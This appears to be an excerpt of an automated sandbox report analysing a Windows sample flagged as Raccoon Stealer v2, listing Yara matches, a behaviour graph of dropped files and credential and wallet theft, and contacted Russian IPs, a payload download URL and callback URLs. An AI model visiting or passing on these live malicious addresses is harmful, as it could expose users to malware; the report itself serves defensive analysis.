Source: Yara match File source: 00000001.00000003.463138382.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.508255245.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463345859.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463360995.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463226979.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463317653.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463266718.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463179986.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.510097829.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463066679.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XHSRZM23.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5920, type: MEMORYSTR
Source: Yara match File source: 1.3.XHSRZM23.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.1455940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.XHSRZM23.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.1455940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.14294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.13aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.616496245.0000024ABD467000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.510026391.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.509943695.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.564056482.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.635823652.0000024AC56F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Raccoon Stealer v2
Source: Yara match File source: EJ6FBXJ9Dg.exe, type: SAMPLE
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.EJ6FBXJ9Dg.exe.af0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.65.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.EJ6FBXJ9Dg.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.45.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.62.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.42.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.48.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.53.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.36.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.EJ6FBXJ9Dg.exe.97e1d3.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.59.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.38.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.50.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.EJ6FBXJ9Dg.exe.97e1d3.33.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.311564503.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.313851264.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312521488.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.314342584.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306122404.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.309062982.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312858440.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.299025319.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312044300.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307116929.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.314171786.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.313465348.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307229333.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.311755753.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312701819.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.313233665.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.313073419.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.303236986.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.320054866.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.309934839.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307287486.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.310475968.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312379601.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.313656413.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.304707306.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.299000955.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312199871.0000000000992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 722131 Sample: EJ6FBXJ9Dg.exe Startdate: 13/10/2022 Architecture: WINDOWS Score: 100 52 trackingg-protectioon.cdn1.mozilla.net 2->52 66 Snort IDS alert for network traffic 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Antivirus detection for URL or domain 2->70 72 10 other signatures 2->72 9 EJ6FBXJ9Dg.exe 25 2->9         started        14 mshta.exe 19 2->14         started        signatures3 process4 dnsIp5 54 188.127.227.51, 49697, 80 DHUBRU Russian Federation 9->54 56 qpdownloads.com 31.31.198.19, 49698, 80 AS-REGRU Russian Federation 9->56 40 C:\Users\user\AppData\Roaming\XHSRZM23.exe, PE32 9->40 dropped 42 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 9->42 dropped 44 C:\Users\user\AppData\LocalLow\softokn3.dll, PE32 9->44 dropped 46 5 other files (3 malicious) 9->46 dropped 74 Tries to harvest and steal browser information (history, passwords, etc) 9->74 76 Tries to steal Crypto Currency Wallets 9->76 16 XHSRZM23.exe 6 9->16         started        20 powershell.exe 28 14->20         started        file6 signatures7 process8 dnsIp9 48 45.8.158.104, 49699, 80 ASBAXETNRU Russian Federation 16->48 50 trackingg-protectioon.cdn1.mozilla.net 16->50 58 Antivirus detection for dropped file 16->58 60 Found evasive API chain (may stop execution after checking system information) 16->60 62 Machine Learning detection for dropped file 16->62 64 3 other signatures 16->64 34 C:\Users\user\AppData\...\mkr2iq4u.cmdline, Unicode 20->34 dropped 23 csc.exe 3 20->23         started        26 csc.exe 3 20->26         started        28 conhost.exe 20->28         started        file10 signatures11 process12 file13 36 C:\Users\user\AppData\Local\...\jv54rgf4.dll, PE32 23->36 dropped 30 cvtres.exe 1 23->30         started        38 C:\Users\user\AppData\Local\...\mkr2iq4u.dll, PE32 26->38 dropped 32 cvtres.exe 1 26->32         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.127.227.51
 unknown Russian Federation
56694 DHUBRU true
45.8.158.104
 unknown Russian Federation
49392 ASBAXETNRU false
31.31.198.19
 qpdownloads.com Russian Federation
197695 AS-REGRU false

Contacted Domains

Name IP Active
qpdownloads.com 31.31.198.19 true
trackingg-protectioon.cdn1.mozilla.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.8.158.104/uploaded/7PEROc7T_2Fgr3AlFhC44I/HihA8yGOnHHyC/7qKpRjMK/_2BISfbG8Z1hpAn69C67v7h/gkKIfJKu9W/RfGqkB9ODhAT7t3c5/NgU9QmTJW10x/ljH6Rbwk6Te/NQKogNebUNXkBe/OP8YU_2BPfX7w7JRWnzlY/DYJ2tPBGUU9yVi7O/2UHx3wnrI8usjfi/mEy_2FvxgACU_2BVfF/k_2BhGhcG/DY4c1ymhU_2BCF0kWEYq/M0_2B_2F16h_2BgoOGF/9_2FtG_2F6BZfr3nq2A72O/TaGtamWcSmCx5/BKV7x7CGne61RjWS63/G.pct false
  • Avira URL Cloud: safe
 unknown
http://188.127.227.51/ true
  • Avira URL Cloud: safe
 unknown
http://188.127.227.51/49d6ec0cd113efb59453fa49c7f2abcd true
  • Avira URL Cloud: safe
 unknown
http://45.8.158.104/uploaded/zbAczskpRoi/wpOTNz2ovPWOn_/2B_2FrKEtFFbUGtGX6UpM/aPAjWjIABTFmZnGA/TX3qfwxbX9aDBL1/IeT5piixzi8h4SRl9u/8_2B0Atg2/EH_2BuWU2tSI81tfObAy/vUlIlX4Ry5a2Lkg_2BA/WrsB69Jk6Nr0AfUnViCZgr/xOQsHH2r7bRf4/GbUKvAO_/2B_2BNCAwjUDjs1PnMfwFho/BSlcplWuk_/2ByFg1B7Jha7Qhk7w/kMamT9D_2B57/Uw_2B3UVmpC/BA7AL3JebG7W65/8MiRPWVyAeG2AtQC9YkgU/qP7k.pct false
  • Avira URL Cloud: safe
 unknown
http://qpdownloads.com/10103.exe false
  • Avira URL Cloud: malware
 unknown
http://45.8.158.104/uploaded/Xac7t2mitXIgCMsf9BuB/MO0_2Fwxiby6n8I6o_2/FDgHHlLSuOuDkfbPQtCcKd/YlwrlyDXRc_2B/ixVyFqQK/k126u_2B_2Ba_2BruFx1_2F/jniVE8w7fc/bk1R9cvUDCNSr3LVX/6pZVXtyVf482/WFP0247XYM7/A2gUdzKCCOqwfV/Gv8pnlgo2_2FOJ3S2ifKR/bqy_2FBRKHq_2Fpg/Vdjwqlx7uWisr2l/fEIsbd32W_2FSgiOj7/dytSGoyJO/SSfkZcDtemeWWSjAjk_2/FpEHeBUMQUi3yJQSNuD/_2FtYwM7I7Bk/pKYwZ.pct false
  • Avira URL Cloud: safe
 unknown